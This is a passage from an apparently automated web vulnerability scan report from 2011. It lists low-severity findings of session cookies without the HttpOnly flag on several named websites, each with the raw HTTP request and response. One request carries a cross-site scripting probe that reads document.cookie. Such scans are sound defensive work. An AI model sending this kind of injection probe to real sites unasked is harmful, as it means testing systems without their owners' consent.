Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=FIPGGKOBCKIKFFAJIKFOHMCJ; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:53 GMT

18.62. http://www.advisorsquare.com/new/images/content_bg_repeat.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/images/content_bg_repeat.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/images/content_bg_repeat.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=IIPGGKOBOKPIOONMMCJMBFHP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:54 GMT

18.63. http://www.advisorsquare.com/new/js/jquery-1.4.4.min.js.txt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/js/jquery-1.4.4.min.js.txt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/js/jquery-1.4.4.min.js.txt HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EBPGGKOBEDAMBLPHHFDGCIBF; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:25:31 GMT

18.64. http://www.advisorsquare.com/new/js/menu.js.txt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/js/menu.js.txt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/js/menu.js.txt HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=MHPGGKOBDBFBNBFLPAMOOOAF; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:51 GMT

18.65. http://www.advisorsquare.com/new/js/preload.js.txt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/js/preload.js.txt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/js/preload.js.txt HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=BHPGGKOBMBFNIEHMNMEAAKOA; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:49 GMT

18.66. http://www.advisorsquare.com/research/content.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /research/content.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/content.asp?contentid=2016389142 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PDAHGKOBEGNFBKKCHIGNLHCL; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:29:16 GMT

18.67. http://www.advisorsquare.com/useradmin/Authenticate.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2145
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=OOBHGKOBOBCFHHIMIHNKOOLC; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:43 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
18.68. http://www.advisorsquare.com/websites1/PR/images/dotclear.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /websites1/PR/images/dotclear.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /websites1/PR/images/dotclear.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EFPGGKOBBANFNJNHNBGACJKI; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:32 GMT

18.69. http://www.advisorsquare.com/websites1/Web/img/dotclear.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /websites1/Web/img/dotclear.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /websites1/Web/img/dotclear.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=JAPGGKOBMKEKGMFBCIFDCCIP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:25:22 GMT

18.70. http://www.brownrudnick.com/nr/alertsArchv.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nr/alertsArchv.asp?Year=2006 HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:46:49 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 23971
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=COGCALMBNJPDKEEGDCLIJLKB; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
18.71. http://www.brownrudnick.com/nr/alertsArchv.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nr/alertsArchv.asp?Year=2006 HTTP/1.1
Host: www.brownrudnick.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQRDRRTT=LPGCALMBHBMDBAFEOEDHOHHC

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 20:53:22 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 23971
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRCRQSS=ANFNGECCFCHCHLCEIHEFGFPD; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
18.72. http://www.brownrudnick.com/nr/articlesindv.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/articlesindv.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nr/articlesindv.asp?ID=554f0bd0<script>alert(document.cookie)</script>ba5591b9a23 HTTP/1.1
Pragma: no-cache
Host: www.brownrudnick.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:48:10 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11237
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=ADHCALMBLMFJLBFNGJKMHGAL; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
18.73. http://www.btamericascareers.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.btamericascareers.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.btamericascareers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:24:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tci6ko04boj81fcvvv8p6fm382; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5803
Connection: close
Content-Type: text/html; Charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
18.74. http://www.clone-systems.com/ecommerce/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:47:46 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; expires=Sun, 08-May-2011 00:47:46 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
18.75. http://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:54:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=eh9g2srl048i41kr56sr7gdb93; expires=Sun, 08-May-2011 00:54:50 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Sat, 14 May 2011 00:54:50 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 190
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'http://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           
18.76. http://www.clone-systems.com/resell-clone-guard.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /resell-clone-guard.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resell-clone-guard.html HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:47:42 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 07 May 2011 00:47:42 GMT
X-Powered-By: Nette Framework
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 16788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head>

<title>Sell
...[SNIP]...
18.77. http://www.clone-systems.com/stylesheet.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /stylesheet.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheet.php?cssid=63 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:54:44 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=hltjgmc2l21abrcs4hu5ni2kn2; path=/
Expires: Sat, 07 May 2011 03:54:44 GMT
Cache-Control: public, max-age=10800
Last-Modified: Sat, 07 May 2011 00:54:41 GMT
X-Powered-By: Nette Framework
Etag: "e375fb226bdc16f8e345159ec3798830"
Vary: Accept-Encoding
Content-Type: text/css; charset=utf-8
Content-Length: 2666

/* Start of CMSMS style sheet 'Clone Hortizontal Menu Blalox' */
#navbar-container {
   width: 920px;
   height: 40px;
   background: url(../images/navbar.png) no-repeat;
   margin: 10px auto;
}

#primary-nav
...[SNIP]...
18.78. https://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.clone-systems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:55:30 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=sea1lu7lraticbpq2b4jg4uup4; expires=Sun, 08-May-2011 00:55:30 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Sat, 14 May 2011 00:55:30 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 191
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'https://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           
18.79. https://www.clone-systems.com/stylesheet.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.clone-systems.com
Path:   /stylesheet.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheet.php?cssid=31&mediatype=screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.clone-systems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:04:33 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=0fq4i44s8389og2150hod7eo10; path=/
Expires: Sat, 07 May 2011 04:04:33 GMT
Cache-Control: public, max-age=10800
Last-Modified: Sat, 07 May 2011 00:54:52 GMT
X-Powered-By: Nette Framework
Etag: "f1688bee3cc8398af5a80c595e645816"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css; charset=utf-8
Content-Length: 2811

/* Start of CMSMS style sheet 'Accessibility and cross-browser tools' */
/* accessibility */
/* menu links accesskeys */
span.accesskey {
   text-decoration: none;
}
/* accessibility divs are hidde
...[SNIP]...
18.80. http://www.cloneguard.com/pci-scanning.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cloneguard.com
Path:   /pci-scanning.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pci-scanning.asp HTTP/1.1
Host: www.cloneguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBRTTDR=EOCHINECPGBDMNBGNIFHHHKH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:56 GMT
Content-Length: 20650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us">
<head>
<meta c
...[SNIP]...
18.81. http://www.compliancepoint.com/sub_serv_isc_pci.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.compliancepoint.com
Path:   /sub_serv_isc_pci.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ HTTP/1.1
Host: www.compliancepoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:16:34 GMT
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e72934c3e090fe010326c542496bd26f; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.compliancepoint.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 17114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADDBQTC=NKAKGEBDADCKPECBKIOIPJEM; path=/
Cache-control: private

<html>
<head>
<title>CompliancePoint</title>

<link href="menu.css" type=text/css rel=stylesheet />
<link href="style.css" type=text/css rel=stylesheet />
<script src="main.js"></script>
<scrip
...[SNIP]...
18.82. http://www.dominionenterprises.com/main/do/Advertiser_Agreement  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:02 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=a04a37315744dfa2c5d0a931085c6e24; expires=Sun, 08 May 2011 19:34:02 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:34:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=fed4b74685f8c1dc6296cbb5d2e09fb36a0cd9d3c40f8c0d4dc4429f9c5eca85da809a57; Path=/
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />

...[SNIP]...
18.83. http://www.dominionenterprises.com/main/do/Careers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
